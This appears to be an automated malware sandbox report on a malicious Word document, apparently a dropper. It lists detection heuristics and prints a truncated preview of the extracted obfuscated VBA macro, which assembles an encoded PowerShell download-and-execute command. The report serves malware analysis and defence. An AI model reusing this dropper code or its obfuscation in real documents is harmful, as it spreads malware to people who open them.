MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen function is triggered upon opening, and it constructs and executes a Base64 encoded PowerShell command. This command is designed to download and execute a second-stage payload, indicated by the obfuscated string and the use of PowerShell. The ClamAV detection name 'Doc.Dropper.Valyria-6666905-0' further supports its role as a dropper.
Heuristics 5
-
ClamAV: Doc.Dropper.Valyria-6666905-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6666905-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43851 bytes |
SHA-256: 8394ff315bbee33b2bf614036ed55a6df020367de441e3febdb8be5847555d6f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RElXjaEFEsoadB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "kDwtSJIPjsB" Function QuhNsEsSuK() On Error Resume Next ckKFr = "oPIZEc" VarType CByte(4) IsArray Sin(PqzMhv - cGXvN - 20415 / DubBwk) lawzOpMYozv = "mD " + "/" + "v ^ ^ " + "/r " + CStr(Chr(DrlXfAmbVQnKz + nQOqzqoZsUi + 34 + kkGTPVtwsvEB + pzwdTfuWFUv)) + " SET " + " " IsArray Val(jOoAfa) ckKFr = CDec(HwPiUi) IsArray Sqr(62) SwwHsDmj = "^ " + "rX" + "B^" + "Q^=po^w" + "^e" + "rs^" + "h^e^l" + "l^ ^-" + "^" + "e^ JA" + "^" + "BRA^Gw" + "^A^bg^" ckKFr = 6592386 VarType Str(aztYzY) VarType TimeValue(JIHGT * jEIrm * MvcXif / 29611) lnsFV = "A9" + "AG^4A" + "^" + "ZQ" + "^" + "B.^AC0A" + "b^w^B" + "]A^" VarType Rnd(qTElSK) IsArray Atn(565) IsArray 8773 bWJdLoGa = "G^oAZ^" + "QBjA^" + "_^" + "Q^AI^" + "AB^" + "OAG^'^" + "Ad^" + "A" ckKFr = "bSGER" ckKFr = Int(5) IsArray Second(GzAit) SuHRAzOGS = "Au^" + "A/^\^" + "A^Z^QB" + "]^AE" + "^,^Ab" + "^" + "A^B^p" + "A" + "^" + "G'^Ab" + "g" + "B0" VarType 115 IsArray Cos(60) IwwdC = "^A^2s" + "^A^J" + "A" + "BNA/I^" + "AR^QA9" + "^AC" + "\^A^aA" IsArray CDate(4301) IsArray 340 IsArray 2365 dBUVFIT = "^" + "B0" + "A^_^QA^" + "\A^A^6A" + "C^8^A)^" + "w^B" + "^k^AG^" + "8^Ab" QuhNsEsSuK = lawzOpMYozv + SwwHsDmj + lnsFV + bWJdLoGa + SuHRAzOGS + IwwdC + dBUVFIT VarType Str(227283539) IsArray 845 End Function Function TlduaiiHi() On Error Resume Next ckKFr = Second(72058 * cSpElc - 55921 - IspGO) VarType LCase(VrZJN) IsArray TimeValue(qtHaQY) NbMSQ = "^Q^Bl" + "^A^_,Ad" + "^A" + "BpAG^," + "^A,gA" + "^x" + "AC4A^" + "[^wBv" + "A" + "G^0" + "^A" + ")w" IsArray 294798985 IsArray 3 IsArray Sin(jIroHw) LEGZmGR = "B^" + "I" + "A^G^'AV" + "g" + "^BJA" ckKFr = Rnd(ZRXbGY) VarType "TtsUDs" rddnhn = "2Q^A^'" + "ABA" + "^AGgA" + "^d" + "^A^B^" + "0A^_" + "AAO^g^" + "A" + "v" IsArray TimeValue(604) VarType Tan(134965962) NpzjcLMP = "AC^" + "8A^b^A" + "Bh^A" + "_^,A^Z" + "QB^yAC" + "^0" + "^A[^w^" ckKFr = "KEnEZ" ckKFr = TimeValue(25) oGmVH = "BvA^2" + "I" + "^" + "A)^g^Bj" + "^AG8Ab" + "QAu^" + "A" + "^" + "_^AAbA" ckKFr = Month(zKJGjK + zPTllj) IsArray "lzvjVd" IsArray Round(sLFwV) ocRjsJA = "^" + "AvA" + "^2^AA" + "Nw" + "B^_A2" + "QAV^AA4" + "A2," + "^A^Q^A^" + "B^o" + "A" ckKFr = "LqsWi" VarType 9616 ckKFr = "WiiWw" tZDlcTZM = "_^Q^Ad^" + "A" + "^B" + "^" + "w^A^" + "2o^" + "A)w^A" + "vA^G" + "sA^\QB" + "zAC^4^A" IsArray "TbMOzO" VarType "MYMKzo" ZrqSiX = "b^" + "Q^B" + "^l^A" + "C" + "8A," + "Q^B3^" + "A" + "^2[A^e" + "^" TlduaiiHi = NbMSQ + LEGZmGR + rddnhn + NpzjcLMP + oGmVH + ocRjsJA + tZDlcTZM + ZrqSiX ckKFr = "jQnRot" VarType CBool(26829 / ZuqNd) End Function Function rHfAPtqzw() On Error Resume Next IsArray "iaIjkF" VarType CByte(9673 * CHnAz * 50146 - KKWDWt) IsArray Sin(94) hjojizCi = "QBXA^_" + "^g^" + "A^" + "\A^BA" + "AG^g" + "^AdA^" IsArray 4 ckKFr = CByte(418) IsArray 11 IsHPkaOJmPm = "B" + "0A" + "^_AAO^g" + "AvA" + "C8^A" + "b^Q^" + "B^l^A" + "^G^" ckKFr = 24 IsArray Atn(16059151) VarType CDate(tumCXa) JJvfWQFBCfp = "Q^Aa^" + "QB" + "v^AG^" + "4^A" + ")g^B]AG" + "^EA)w" + "^BuA" + "_" ckKFr = Second(86399 - SmtMW + 18190 + FTGiU) VarType 8 ckKFr = "DXkzw" jVGXKksXm = "o" + "A^e" + "^" + "g^A^y" + "^A/,A" ckKFr = Int(jOrCi) ckKFr = "ZKbHaV" tzkMvNu = "Q^ABoA^" + "_^QA" + "d^ABw^" + "A" + "2oA)w^A" + "vA_^" + "g^A^bg" + "^AtAC" + "0A^Z^Q" VarType Atn(apwTC) IsArray "bTETL" IsArray LCase(XXRnMj + OiDzKa) HzwfpGqbZi = "^AxA^" + "G^E^" + "A^Z^w" + "B^t^" + "A^G" + ",A" + "Z^w^Bh" + "A" + "G^\" + "AZ^A" + "^Br^" rHfAPtqzw = hjojizCi + IsHPkaOJmPm + JJvfWQFBCfp + jVGXKksXm + tzkMvNu + HzwfpGqbZi ckKFr = Str(nAjXcQ + TjwBR * CFbDqT - rEnTNl) IsArray Atn(2) End ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.